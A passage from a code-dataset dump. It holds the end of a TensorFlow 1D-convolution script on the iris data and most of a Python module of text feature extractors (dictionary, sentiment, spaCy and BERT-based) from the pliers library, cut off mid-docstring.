tf.placeholder(tf.float32,[None,3])\n\nprint(\"---xiaoyao--->\")\nex_2d_y = 
iris.target.reshape(-1,1)\n\nfeed_Y = OneHotEncoder().fit_transform(ex_2d_y).todense()\nfeed_dict = {tf_X: iris.data,tf_Y:feed_Y}\n\nconv_filter_w1 = tf.Variable(tf.random_normal([1, 3, 1, 10]))\nconv_filter_b1 = tf.Variable(tf.random_normal([10]))\n\nmy_filter = tf.Variable(tf.random_normal(shape=[1, conv_size, 1, 1]))\nconv_filter_b1 = tf.Variable(tf.random_normal([1]))\n\nmy_convolution_output = conv_layer_1d(tf_X, my_filter, stride=stride_size)\nmy_activation_output = activation(my_convolution_output)\nmy_maxpool_output = max_pool(my_activation_output, width=maxpool_size, stride=stride_size)\n\nmy_full_output = fully_connected(my_maxpool_output,3)\n\ninit = tf.global_variables_initializer()\n\nprint('>>>> 1D Data <<<<')\n\n# Convolution Output\n#print('Input = array of length %d'%(tf_X.shape.as_list()[0])) # 25\n#print('Convolution w/ filter, length = %d, stride size = %d, results in an array of length %d:'%\n      #(conv_size, stride_size, my_convolution_output.shape.as_list()[0])) # 21\n#print(sess.run(my_convolution_output, feed_dict=feed_dict))\n\n#print(sess.run(my_full_output, feed_dict=feed_dict))\nloss = -tf.reduce_mean(tf_Y*tf.log(tf.clip_by_value(my_full_output,1e-11,1.0)))\n\n#train_step = tf.train.AdamOptimizer(1e-3).minimize(loss)\ntrain_op = tf.train.GradientDescentOptimizer(learning_rate=0.001).minimize(loss)\ny_pred = tf.arg_max(my_full_output,1)\nbool_pred = tf.equal(tf.arg_max(tf_Y,1),y_pred)\n\naccuracy = tf.reduce_mean(tf.cast(bool_pred,tf.float32)) # accuracy\n\nsess.run(init)\nfor batch_xs, batch_ys in generatebatch(iris.data, feed_Y, feed_Y.shape[0], 10): # mini-batch gradient descent (MBGD) each epoch\n    #print(sess.run(loss, feed_dict=feed_dict))\n    print(\"---------\")\n    print(sess.run([tf_Y,y_pred,accuracy], feed_dict={tf_X: batch_xs, tf_Y: batch_ys}))\n    print(\"---------\")\n\n    # print(sess.run(tf.cast(bool_pred,tf.float32) , feed_dict={tf_X: batch_xs, tf_Y: batch_ys}))\n    #print(sess.run(accuracy, feed_dict={tf_X: batch_xs, tf_Y: batch_ys}))\n#print(sess.run(loss, feed_dict=feed_dict))\n\"\"\"\n# Activation Output\nprint('\\nInput = above array of length %d'%(my_convolution_output.shape.as_list()[0])) # 21\nprint('ReLU element wise returns an array of length %d:'%(my_activation_output.shape.as_list()[0])) # 21\nprint(sess.run(my_activation_output, feed_dict=feed_dict))\n\n\n# Max Pool Output\nprint('\\nInput = above array of length %d'%(my_activation_output.shape.as_list()[0])) # 21\nprint('MaxPool, window length = %d, stride size = %d, results in the array of length %d'%\n      (maxpool_size, stride_size, my_maxpool_output.shape.as_list()[0])) # 17\nprint(sess.run(my_maxpool_output, feed_dict=feed_dict))\n\n# Fully Connected Output\nprint('\\nInput = above array of length %d'%(my_maxpool_output.shape.as_list()[0])) # 17\nprint('Fully connected layer on all 4 rows with %d outputs:'%\n      (my_full_output.shape.as_list()[0])) # 5\nprint(sess.run(my_full_output, feed_dict=feed_dict))\n\"\"\"\n\n\"\"\"\n# Define the input tensor\ninput = np.array(np.arange(1, 1+10*8*16).reshape([10, 8, 16]), dtype=np.float32)\nprint(input.shape)\n\n# Convolution kernel\nkernel = np.array(np.arange(1, 1+5*16*3), dtype=np.float32).reshape([5, 16, 3])\nprint(kernel.shape)\n\n# Apply the conv1d convolution\nconv1out = tf.nn.conv1d(input, kernel, 1, 'VALID')\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n    # Initialize variables\n    sess.run(init)\n    # Print the convolution result\n    print(sess.run(conv1out).shape)\n    
print(sess.run(conv1out))\n\"\"\"","repo_name":"yaoxiaohappy/Algorithm_python","sub_path":"algorithm/deepLearning/Conv_1d.py","file_name":"Conv_1d.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27987003424","text":"'''\nExtractors that operate primarily or exclusively on Text stimuli.\n'''\nimport sys\nimport itertools\nimport logging\n\nimport numpy as np\nimport pandas as pd\nimport scipy\nimport nltk\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\nfrom pliers.stimuli.text import TextStim, ComplexTextStim\nfrom pliers.extractors.base import Extractor, ExtractorResult\nfrom pliers.support.exceptions import PliersError\nfrom pliers.support.decorators import requires_nltk_corpus\nfrom pliers.datasets.text import fetch_dictionary\nfrom pliers.transformers import BatchTransformerMixin\nfrom pliers.utils import (attempt_to_import, verify_dependencies, flatten,\n listify)\n\n\nkeyedvectors = attempt_to_import('gensim.models.keyedvectors', 'keyedvectors',\n ['KeyedVectors'])\nsklearn_text = attempt_to_import('sklearn.feature_extraction.text', 'sklearn_text',\n ['CountVectorizer'])\nspacy = attempt_to_import('spacy')\ntransformers = attempt_to_import('transformers')\n\nclass TextExtractor(Extractor):\n\n ''' Base Text Extractor class; all subclasses can only be applied to text.\n '''\n _input_type = TextStim\n\n\nclass ComplexTextExtractor(Extractor):\n\n ''' Base ComplexTextStim Extractor class; all subclasses can only be\n applied to ComplexTextStim instance.\n '''\n _input_type = ComplexTextStim\n\n def _extract(self, stim):\n ''' Returns all words. '''\n props = [(e.text, e.onset, e.duration) for e in stim.elements]\n vals, onsets, durations = map(list, zip(*props))\n return ExtractorResult(vals, stim, self, ['word'], onsets, durations)\n\n\nclass DictionaryExtractor(TextExtractor):\n\n ''' A generic dictionary-based extractor that supports extraction of\n arbitrary features contained in a lookup table.\n\n Args:\n dictionary (str, DataFrame): The dictionary containing the feature\n values. Either a string giving the path to the dictionary file,\n or a pandas DF. Format must be tab-delimited, with the first column\n containing the text key used for lookup. 
Subsequent columns each\n            represent a single feature that can be used in extraction.\n        variables (list): Optional subset of columns to keep from the\n            dictionary.\n        missing: Value to insert if no lookup value is found for a text token.\n            Defaults to numpy's NaN.\n    '''\n\n    _log_attributes = ('dictionary', 'variables', 'missing')\n    VERSION = '1.0'\n\n    def __init__(self, dictionary, variables=None, missing=np.nan):\n        if isinstance(dictionary, str):\n            self.dictionary = dictionary # for TransformationHistory logging\n            dictionary = pd.read_csv(dictionary, sep='\\t', index_col=0)\n        else:\n            self.dictionary = None\n        self.data = dictionary\n        if variables is None:\n            variables = list(self.data.columns)\n        else:\n            self.data = self.data[variables]\n        self.variables = variables\n        # Set up response when key is missing\n        self.missing = missing\n        super().__init__()\n\n    def _extract(self, stim):\n        if stim.text not in self.data.index:\n            vals = pd.Series(self.missing, self.variables)\n        else:\n            vals = self.data.loc[stim.text].fillna(self.missing)\n        vals = vals.to_dict()\n        return ExtractorResult(np.array([list(vals.values())]), stim, self,\n                               features=list(vals.keys()))\n\n\nclass PredefinedDictionaryExtractor(DictionaryExtractor):\n\n    ''' A generic Extractor that maps words onto values via one or more\n    pre-defined dictionaries accessed via the web.\n\n    Args:\n        variables (list or dict): A specification of the dictionaries and\n            column names to map the input TextStims onto. If a list, each\n            element must be a string with the format 'dict/column', where the\n            value before the slash gives the name of the dictionary, and the\n            value after the slash gives the name of the column in that\n            dictionary. These names can be found in the dictionaries.json\n            specification file under the datasets submodule. Examples of\n            valid values are 'affect/V.Mean.Sum' and\n            'subtlexusfrequency/Lg10WF'. If a dict, the keys are the names of\n            the dictionary files (e.g., 'affect'), and the values are lists\n            of columns to use (e.g., ['V.Mean.Sum', 'V.SD.Sum']).\n        missing (object): Value to use when an entry for a word is missing in\n            a dictionary (defaults to numpy's NaN).\n        case_sensitive (bool): If True, entries in the dictionary are treated\n            as case-sensitive (e.g., 'John' and 'john' are different words).\n        force_retrieve (bool): If True, the source dictionary will always be\n            retrieved/downloaded, even if it exists locally. 
If False, a cached\n local version will be used if it exists.\n '''\n\n _log_attributes = ('variables', 'missing', 'case_sensitive')\n VERSION = '1.0'\n\n def __init__(self, variables, missing=np.nan, case_sensitive=False,\n force_retrieve=False):\n\n self.case_sensitive = case_sensitive\n\n if isinstance(variables, (list, tuple)):\n _vars = {}\n for v in variables:\n v = v.split('/')\n if v[0] not in _vars:\n _vars[v[0]] = []\n if len(v) == 2:\n _vars[v[0]].append(v[1])\n variables = _vars\n\n dicts = []\n for k, v in variables.items():\n d = fetch_dictionary(k, force_retrieve=force_retrieve)\n if not case_sensitive:\n d.index = d.index.str.lower()\n if v:\n d = d[v]\n d.columns = ['{}_{}'.format(k, c) for c in d.columns]\n dicts.append(d)\n\n # Make sure none of the dictionaries have duplicate indices\n drop_dups = lambda d: d[~d.index.duplicated(keep='first')]\n dicts = [d if d.index.is_unique else drop_dups(d) for d in dicts]\n\n dictionary = pd.concat(dicts, axis=1, join='outer', sort=False)\n\n super().__init__(\n dictionary, missing=missing)\n\n\nclass LengthExtractor(TextExtractor):\n\n ''' Extracts the length of the text in characters. '''\n\n VERSION = '1.0'\n\n def _extract(self, stim):\n return ExtractorResult(np.array([[len(stim.text.strip())]]), stim,\n self, features=['text_length'])\n\n\nclass NumUniqueWordsExtractor(TextExtractor):\n\n ''' Extracts the number of unique words used in the text. '''\n\n _log_attributes = ('tokenizer',)\n VERSION = '1.0'\n\n def __init__(self, tokenizer=None):\n super().__init__()\n self.tokenizer = tokenizer\n\n @requires_nltk_corpus\n def _extract(self, stim):\n text = stim.text\n if self.tokenizer is None:\n if nltk is None:\n num_words = len(set(text.split()))\n else:\n try:\n num_words = len(set(nltk.word_tokenize(text)))\n except LookupError:\n nltk.download('punkt')\n num_words = len(set(nltk.word_tokenize(text)))\n \n else:\n num_words = len(set(self.tokenizer.tokenize(text)))\n\n return ExtractorResult(np.array([[num_words]]), stim, self,\n features=['num_unique_words'])\n\n\nclass PartOfSpeechExtractor(BatchTransformerMixin, TextExtractor):\n\n ''' Tags parts of speech in text with nltk. '''\n\n _batch_size = sys.maxsize\n VERSION = '1.0'\n\n @requires_nltk_corpus\n def _extract(self, stims):\n words = [w.text for w in stims]\n pos = nltk.pos_tag(words)\n if len(words) != len(pos):\n raise PliersError(\n \"The number of words does not match the number of tagged words\"\n \"returned by nltk's part-of-speech tagger.\")\n\n results = []\n tagset = nltk.data.load('help/tagsets/upenn_tagset.pickle').keys()\n for i, s in enumerate(stims):\n pos_vector = dict.fromkeys(tagset, 0)\n pos_vector[pos[i][1]] = 1\n values = [list(pos_vector.values())]\n results.append(ExtractorResult(values, s, self,\n features=list(pos_vector.keys())))\n\n return results\n\n\nclass WordEmbeddingExtractor(TextExtractor):\n\n ''' An extractor that uses a word embedding file to look up embedding\n vectors for text.\n\n Args:\n embedding_file (str): Path to a word embedding file. Assumed to be in\n word2vec format compatible with gensim.\n binary (bool): Flag indicating whether embedding file is saved in a\n binary format.\n prefix (str): Prefix for feature names in the ExtractorResult.\n unk_vector (numpy array or str): Default vector to use for texts not\n found in the embedding file. If None is specified, uses a\n vector with all zeros. If 'random' is specified, uses a vector with\n random values between -1.0 and 1.0. 
Must have the same dimensions\n            as the embeddings.\n    '''\n\n    _log_attributes = ('wvModel', 'prefix')\n\n    def __init__(self, embedding_file, binary=False, prefix='embedding_dim',\n                 unk_vector=None):\n        verify_dependencies(['keyedvectors'])\n        self.wvModel = keyedvectors.KeyedVectors.load_word2vec_format(\n            embedding_file, binary=binary)\n        self.prefix = prefix\n        self.unk_vector = unk_vector\n        super().__init__()\n\n    def _extract(self, stim):\n        num_dims = self.wvModel.vector_size\n        if stim.text in self.wvModel:\n            embedding_vector = self.wvModel[stim.text]\n        else:\n            unk = self.unk_vector\n            if hasattr(unk, 'shape') and unk.shape[0] == num_dims:\n                embedding_vector = unk\n            elif unk == 'random':\n                embedding_vector = 2.0 * np.random.random(num_dims) - 1.0\n            else:\n                # By default, UNKs will have zeroed-out vectors\n                embedding_vector = np.zeros(num_dims)\n\n        features = ['%s%d' % (self.prefix, i) for i in range(num_dims)]\n        return ExtractorResult([embedding_vector],\n                               stim,\n                               self,\n                               features=features)\n\n\nclass TextVectorizerExtractor(BatchTransformerMixin, TextExtractor):\n\n    ''' Uses a scikit-learn Vectorizer to extract bag-of-features\n    from text.\n\n    Args:\n        vectorizer (sklearn Vectorizer or str): a scikit-learn Vectorizer\n            (or the name in a string) to extract with. Will use the\n            CountVectorizer by default. Uses supporting *args and **kwargs.\n    '''\n\n    _log_attributes = ('vectorizer',)\n    _batch_size = sys.maxsize\n\n    def __init__(self, vectorizer=None, *vectorizer_args, **vectorizer_kwargs):\n        verify_dependencies(['sklearn_text'])\n        if isinstance(vectorizer, sklearn_text.CountVectorizer):\n            self.vectorizer = vectorizer\n        elif isinstance(vectorizer, str):\n            vec = getattr(sklearn_text, vectorizer)\n            self.vectorizer = vec(*vectorizer_args, **vectorizer_kwargs)\n        else:\n            self.vectorizer = sklearn_text.CountVectorizer(*vectorizer_args,\n                                                            **vectorizer_kwargs)\n        super().__init__()\n\n    def _extract(self, stims):\n        mat = self.vectorizer.fit_transform([s.text for s in stims]).toarray()\n        results = []\n        for i, row in enumerate(mat):\n            results.append(\n                ExtractorResult([row], stims[i], self,\n                                features=self.vectorizer.get_feature_names()))\n        return results\n\n\nclass VADERSentimentExtractor(TextExtractor):\n\n    ''' Uses nltk's VADER lexicon to extract (0.0-1.0) values for the positive,\n    neutral, and negative sentiment of a TextStim. Also returns a compound\n    score ranging from -1 (very negative) to +1 (very positive). '''\n\n    _log_attributes = ('analyzer',)\n    VERSION = '1.0'\n\n    def __init__(self):\n        self.analyzer = SentimentIntensityAnalyzer()\n        super().__init__()\n\n    @requires_nltk_corpus\n    def _extract(self, stim):\n        scores = self.analyzer.polarity_scores(stim.text)\n        features = ['sentiment_' + k for k in scores.keys()]\n        return ExtractorResult([list(scores.values())], stim, self,\n                               features=features)\n\n\nclass SpaCyExtractor(TextExtractor):\n\n    ''' A generic class for spaCy text extractors\n\n    Uses spaCy to extract features from text. Extracts features for every word\n    (token) in a sentence.\n\n    Args:\n        extractor_type(str): The type of feature to extract. Must be one of\n            'doc' (analyze an entire sentence/document) or 'token'\n            (analyze each word).\n        features(list): A list of strings giving the names of spaCy features to\n            extract. See spaCy documentation for details. 
By default, returns\n            all available features for the given extractor type.\n        model (str): The name of the language model to use.\n    '''\n\n    def __init__(self, extractor_type='token', features=None,\n                 model='en_core_web_sm'):\n\n        verify_dependencies(['spacy'])\n\n        try:\n            self.model = spacy.load(model)\n        except (ImportError, OSError) as e:\n            logging.warning(\"Spacy Models ('{}') not found. Downloading and \"\n                            \"installing\".format(model))\n\n            spacy.cli.download(model)\n            self.model = spacy.load(model)\n\n        logging.info('Loaded model: {}'.format(self.model))\n\n        self.features = features\n        self.extractor_type = extractor_type.lower()\n\n        super().__init__()\n\n    def _extract(self, stim):\n\n        features_list = []\n        elements = self.model(stim.text)\n        order_list = []\n\n        if self.extractor_type == 'token':\n            if self.features is None:\n                self.features = ['text', 'lemma_', 'pos_', 'tag_', 'dep_',\n                                 'shape_', 'is_alpha', 'is_stop', 'is_punct',\n                                 'sentiment', 'is_ascii', 'is_digit']\n\n        elif self.extractor_type == 'doc':\n            elements = [elem.as_doc() for elem in list(elements.sents)]\n            if self.features is None:\n                self.features = ['text', 'is_tagged', 'is_parsed',\n                                 'is_sentenced', 'sentiment']\n\n        else:\n            raise(ValueError(\"Invalid extractor_type; must be one of 'token'\"\n                             \" or 'doc'.\"))\n\n        features_list = []\n        for elem in elements:\n            arr = []\n            for feat in self.features:\n                arr.append(getattr(elem, feat))\n            features_list.append(arr)\n\n        order_list = list(range(1, len(elements) + 1))\n\n        return ExtractorResult(features_list, stim, self,\n                               features=self.features, orders=order_list)\n\n\nclass BertExtractor(ComplexTextExtractor):\n    ''' Returns encodings from the last hidden layer of BERT or similar\n    models (ALBERT, DistilBERT, RoBERTa, CamemBERT). Excludes special tokens.\n    Base class for other Bert extractors.\n    Args:\n        pretrained_model (str): A string specifying which transformer\n            model to use. Can be any pretrained BERT or BERT-derived (ALBERT, \n            DistilBERT, RoBERTa, CamemBERT etc.) models listed at\n            https://huggingface.co/transformers/pretrained_models.html\n            or path to custom model.\n        tokenizer (str): Type of tokenization used in the tokenization step.\n            If different from model, out-of-vocabulary tokens may be treated \n            as unknown tokens.\n        model_class (str): Specifies model type. Must be one of 'AutoModel' \n            (encoding extractor) or 'AutoModelWithLMHead' (language model).\n            These are generic model classes, which use the value of \n            pretrained_model to infer the model-specific transformers \n            class (e.g. BertModel or BertForMaskedLM for BERT, RobertaModel \n            or RobertaForMaskedLM for RoBERTa). Fixed by each subclass.\n        framework (str): name deep learning framework to use. Must be 'pt'\n            (PyTorch) or 'tf' (tensorflow). 
Defaults to 'pt'.\n return_input (bool): if True, the extractor returns encoded token\n and encoded word as features.\n model_kwargs (dict): Named arguments for transformer model.\n See https://huggingface.co/transformers/main_classes/model.html\n tokenizer_kwargs (dict): Named arguments for tokenizer.\n See https://huggingface.co/transformers/main_classes/tokenizer.html\n '''\n\n _log_attributes = ('pretrained_model', 'framework', 'tokenizer_type',\n 'model_class', 'return_input', 'model_kwargs', 'tokenizer_kwargs')\n _model_attributes = ('pretrained_model', 'framework', 'model_class', \n 'tokenizer_type')\n\n def __init__(self,\n pretrained_model='bert-base-uncased',\n tokenizer='bert-base-uncased',\n model_class='AutoModel',\n framework='pt',\n return_input=False,\n model_kwargs=None,\n tokenizer_kwargs=None):\n verify_dependencies(['transformers'])\n if framework not in ['pt', 'tf']:\n raise(ValueError('''Invalid framework;\n must be one of 'pt' (pytorch) or 'tf' (tensorflow)'''))\n self.pretrained_model = pretrained_model\n self.tokenizer_type = tokenizer\n self.model_class = model_class\n self.framework = framework\n self.return_input = return_input\n self.model_kwargs = model_kwargs if model_kwargs else {}\n self.tokenizer_kwargs = tokenizer_kwargs if tokenizer_kwargs else {}\n model = model_class if self.framework == 'pt' else 'TF' + model_class\n self.model = getattr(transformers, model).from_pretrained(\n pretrained_model, **self.model_kwargs)\n self.tokenizer = transformers.BertTokenizer.from_pretrained(\n tokenizer, **self.tokenizer_kwargs)\n super().__init__()\n\n def _mask_words(self, wds):\n ''' Called by _preprocess method. Takes list of words in the Stim as\n input (i.e. the .text attribute for each TextStim in the \n ComplexTextStim). If class has mask attribute, replaces word in \n the input sequence with [MASK] token based on the value of mask \n (either index in the sequence, or word to replace). Here, returns\n list of words (without masking)\n '''\n return wds\n\n def _preprocess(self, stims):\n ''' Extracts text, onset, duration from ComplexTextStim, masks target\n words (if relevant), tokenizes the input, and casts words, onsets,\n and durations to token-level lists. Called within _extract method \n to prepare input for the model. '''\n els = [(e.text, e.onset, e.duration) for e in stims.elements]\n wds, ons, dur = map(list, zip(*els))\n tok = [self.tokenizer.tokenize(w) for w in self._mask_words(wds)]\n n_tok = [len(t) for t in tok]\n stims.name = ' '.join(wds) if stims.name == '' else stims.name\n wds, ons, dur = map(lambda x: np.repeat(x, n_tok), [wds, ons, dur])\n tok = list(flatten(tok))\n idx = self.tokenizer.encode(tok, return_tensors=self.framework)\n return wds, ons, dur, tok, idx\n\n def _extract(self, stims):\n ''' Takes stim as input, preprocesses it, feeds it to Bert model, \n then postprocesses the output '''\n wds, ons, dur, tok, idx = self._preprocess(stims)\n preds = self.model(idx)\n data, feat, ons, dur = self._postprocess(stims, preds, tok, wds, ons, dur)\n return ExtractorResult(data, stims, self, features=feat, onsets=ons, \n durations=dur)\n\n def _postprocess(self, stims, preds, tok, wds, ons, dur):\n ''' Postprocesses model output (subsets relevant information,\n transforms it where relevant, adds model metadata). \n Takes prediction array, token list, word list, onsets \n and durations and input. 
Here, returns token-level encodings \n (excluding special tokens).\n '''\n out = preds.last_hidden_state[:, 1:-1, :]\n if self.framework == 'pt':\n out = out.detach() \n out = out.numpy().squeeze()\n data = [out.tolist()]\n feat = ['encoding']\n if self.return_input:\n data += [tok, wds]\n feat += ['token', 'word']\n return data, feat, ons, dur\n \n def _to_df(self, result):\n res_df = pd.DataFrame(dict(zip(result.features, result._data)))\n res_df['object_id'] = range(res_df.shape[0])\n return res_df\n\n\nclass BertSequenceEncodingExtractor(BertExtractor):\n ''' Extract contextualized sequence encodings using pretrained BERT\n (or similar models, e.g. DistilBERT).\n Args:\n pretrained_model (str): A string specifying which transformer\n model to use. Can be any pretrained BERT or BERT-derived (ALBERT, \n DistilBERT, RoBERTa, CamemBERT etc.) models listed at\n https://huggingface.co/transformers/pretrained_models.html\n or path to custom model.\n tokenizer (str): Type of tokenization used in the tokenization step.\n If different from model, out-of-vocabulary tokens may be treated as\n unknown tokens.\n framework (str): name deep learning framework to use. Must be 'pt'\n (PyTorch) or 'tf' (tensorflow). Defaults to 'pt'.\n pooling (str): defines numpy function to use to pool token-level \n encodings (excludes special tokens).\n return_special (str): defines whether to return encoding for special \n sequence tokens ('[CLS]' or '[SEP]'), instead of pooling of \n other tokens. Must be '[CLS]', '[SEP]', or 'pooler_output'.\n The latter option returns last layer hidden-state of [CLS] token \n further processed by a linear layer and tanh activation function,\n with linear weights trained on the next sentence classification \n task. Note that some Bert-derived models, such as DistilBert, \n were not trained on this task. For these models, setting this \n argument to 'pooler_output' will return an error.\n return_input (bool): If True, the extractor returns an additional \n feature column with the encoded sequence.\n model_kwargs (dict): Named arguments for pretrained model.\n See: https://huggingface.co/transformers/main_classes/model.html\n and https://huggingface.co/transformers/model_doc/bert.html\n tokenizer_kwargs (dict): Named arguments for tokenizer.\n See https://huggingface.co/transformers/main_classes/tokenizer.html\n '''\n\n _log_attributes = ('pretrained_model', 'framework', 'tokenizer_type', \n 'pooling', 'return_special', 'return_input', 'model_class', \n 'model_kwargs', 'tokenizer_kwargs')\n _model_attributes = ('pretrained_model', 'framework', 'model_class', \n 'pooling', 'return_special', 'tokenizer_type')\n\n def __init__(self, pretrained_model='bert-base-uncased',\n tokenizer='bert-base-uncased',\n framework='pt',\n pooling='mean',\n return_special=None,\n return_input=False,\n model_kwargs=None,\n tokenizer_kwargs=None):\n if return_special and pooling:\n logging.warning('Pooling and return_special argument are '\n 'mutually exclusive. 
Setting pooling to None.')\n pooling = None\n if pooling:\n try: \n getattr(np, pooling)\n except:\n raise(ValueError('Pooling must be a valid numpy function.'))\n elif return_special:\n if return_special not in ['[CLS]', '[SEP]', 'pooler_output']:\n raise(ValueError('Value of return_special argument must be '\n 'one of \\'[CLS]\\', \\'[SEP]\\' or \\'pooler_output\\''))\n self.pooling = pooling\n self.return_special = return_special\n super().__init__(\n pretrained_model=pretrained_model, tokenizer=tokenizer, \n return_input=return_input, model_class='AutoModel', \n framework=framework, model_kwargs=model_kwargs, \n tokenizer_kwargs=tokenizer_kwargs)\n\n def _postprocess(self, stims, preds, tok, wds, ons, dur):\n try: \n dur = ons[-1] + dur[-1] - ons[0]\n except:\n dur = None\n ons = ons[0]\n if self.pooling:\n pool_func = getattr(np, self.pooling)\n p = preds.last_hidden_state[0, 1:-1, :]\n if self.framework == 'pt':\n p = p.detach()\n out = pool_func(p.numpy().squeeze(), axis=0)\n elif self.return_special:\n if self.return_special == '[CLS]':\n out = preds.last_hidden_state[:,0,:]\n elif self.return_special == '[SEP]':\n out = preds.last_hidden_state[:,-1,:]\n else:\n out = preds.pooler_output\n if self.framework == 'pt':\n out = out.detach()\n out = out.numpy().squeeze()\n data = [[out.tolist()]]\n feat = ['encoding']\n if self.return_input:\n data += [stims.name]\n feat += ['sequence'] \n return data, feat, ons, dur\n\n\nclass BertLMExtractor(BertExtractor):\n ''' Returns masked words predictions from BERT (or similar, e.g. \n DistilBERT) models.\n Args:\n pretrained_model (str): A string specifying which transformer\n model to use. Can be any pretrained BERT or BERT-derived (ALBERT, \n DistilBERT, RoBERTa, CamemBERT etc.) models listed at\n https://huggingface.co/transformers/pretrained_models.html\n or path to custom model.\n tokenizer (str): Type of tokenization used in the tokenization step.\n If different from model, out-of-vocabulary tokens may be treated as\n unknown tokens.\n framework (str): name deep learning framework to use. Must be 'pt'\n (PyTorch) or 'tf' (tensorflow). Defaults to 'pt'.\n mask (int or str): Words to be masked (string) or indices of \n words in the sequence to be masked (indexing starts at 0). Can\n be either a single word/index or a list of words/indices.\n If str is passed and more than one word in the input matches \n the string, only the first one is masked. \n top_n (int): Specifies how many of the highest-probability tokens are\n to be returned. Mutually exclusive with target and threshold.\n target (str or list): Vocabulary token(s) for which probability is to \n be returned. Tokens defined in the vocabulary change across \n tokenizers. Mutually exclusive with top_n and threshold.\n threshold (float): If defined, only values above this threshold will\n be returned. 
Mutually exclusive with top_n and target.\n return_softmax (bool): if True, returns probability scores instead of \n raw predictions.\n return_masked_word (bool): if True, returns masked word (if defined \n in the tokenizer vocabulary) and its probability.\n model_kwargs (dict): Named arguments for pretrained model.\n See: https://huggingface.co/transformers/main_classes/model.html\n and https://huggingface.co/transformers/model_doc/bert.html.\n tokenizer_kwargs (dict): Named arguments for tokenizer.\n See https://huggingface.co/transformers/main_classes/tokenizer.html.\n '''\n\n _log_attributes = ('pretrained_model', 'framework', 'top_n', 'target', \n 'mask', 'tokenizer_type', 'return_softmax', 'return_masked_word')\n _model_attributes = ('pretrained_model', 'framework', 'top_n', 'mask',\n 'target', 'threshold', 'tokenizer_type')\n\n def __init__(self,\n pretrained_model='bert-base-uncased',\n tokenizer='bert-base-uncased',\n framework='pt',\n mask='MASK',\n top_n=None,\n threshold=None,\n target=None,\n return_softmax=False,\n return_masked_word=False,\n return_input=False,\n model_kwargs=None,\n tokenizer_kwargs=None):\n if any([top_n and target, \n top_n and threshold, \n threshold and target]):\n raise ValueError('top_n, threshold and target arguments '\n 'are mutually exclusive')\n if type(mask) not in [int, str]:\n raise ValueError('Mask must be a string or an integer.')\n super().__init__(pretrained_model=pretrained_model,\n tokenizer=tokenizer, framework=framework, return_input=return_input, \n model_class='AutoModelWithLMHead', model_kwargs=model_kwargs, \n tokenizer_kwargs=tokenizer_kwargs)\n self.target = listify(target)\n if self.target:\n missing = set(self.target) - set(self.tokenizer.vocab.keys())\n if missing:\n logging.warning(f'{missing} not in vocabulary. Dropping.')\n present = set(self.target) & set(self.tokenizer.vocab.keys())\n self.target = list(present)\n if self.target == []:\n raise ValueError('No valid target token. Import transformers'\n ' and run transformers.BertTokenizer.from_pretrained'\n f'(\\'{tokenizer}\\').vocab.keys() to see available tokens')\n self.mask = mask\n self.top_n = top_n\n self.threshold = threshold\n self.return_softmax = return_softmax\n self.return_masked_word = return_masked_word\n \n def update_mask(self, new_mask):\n ''' Updates mask attribute with value of new_mask. \n Args:\n new_mask (str or int): word to mask (str) or index/position of the\n word to mask in input sequence (int). 
Indexing starts at 0.\n '''\n if type(new_mask) not in [str, int]:\n raise ValueError('Mask must be a string or an integer.')\n self.mask = new_mask\n\n def _mask_words(self, wds):\n mwds = wds.copy()\n if isinstance(self.mask, str):\n self.mask_token = self.mask\n self.mask_pos = np.where(np.array(mwds)==self.mask)[0][0]\n else:\n self.mask_pos = self.mask\n self.mask_token = mwds[self.mask]\n mwds[self.mask_pos] = '[MASK]'\n return mwds\n\n def _postprocess(self, stims, preds, tok, wds, ons, dur):\n if self.framework == 'pt':\n preds = preds.logits[:,1:-1,:].detach().numpy()\n else:\n preds = preds.logits[:,1:-1,:].numpy()\n if self.return_softmax:\n preds = scipy.special.softmax(preds, axis=-1)\n out_idx = preds[0,self.mask_pos,:].argsort()[::-1]\n if self.top_n:\n sub_idx = out_idx[:self.top_n]\n elif self.target:\n sub_idx = self.tokenizer.convert_tokens_to_ids(self.target)\n elif self.threshold:\n sub_idx = np.where(preds[0,self.mask_pos,:] >= self.threshold)[0]\n else:\n sub_idx = out_idx\n out_idx = [idx for idx in out_idx if idx in sub_idx]\n feat = self.tokenizer.convert_ids_to_tokens(out_idx)\n feat = [f.capitalize() if len(f)==len(f.encode()) else f for f in feat]\n data = [listify(p) for p in preds[0,self.mask_pos,out_idx]]\n if self.return_masked_word:\n feat, data = self._return_masked_word(preds, feat, data)\n if self.return_input:\n data += [stims.name]\n feat += ['sequence']\n mask_ons = listify(stims.elements[self.mask_pos].onset)\n mask_dur = listify(stims.elements[self.mask_pos].duration)\n return data, feat, mask_ons, mask_dur\n \n\n def _return_masked_word(self, preds, feat, data):\n if self.mask_token in self.tokenizer.vocab:\n true_vocab_idx = self.tokenizer.vocab[self.mask_token]\n true_score = preds[0,self.mask_pos,true_vocab_idx]\n else:\n true_score = np.nan\n logging.warning('True token not in vocabulary. Returning NaN')\n feat += ['true_word', 'true_word_score']\n data += [self.mask_token, true_score]\n return feat, data\n\n \nclass BertSentimentExtractor(BertExtractor):\n ''' Extracts sentiment for sequences using BERT (or similar, e.g. \n DistilBERT) models fine-tuned for sentiment classification.\n Args:\n pretrained_model (str): A string specifying which transformer\n model to use (must be one fine-tuned for sentiment classification)\n tokenizer (str): Type of tokenization used in the tokenization step.\n framework (str): name deep learning framework to use. Must be 'pt'\n (PyTorch) or 'tf' (tensorflow). 
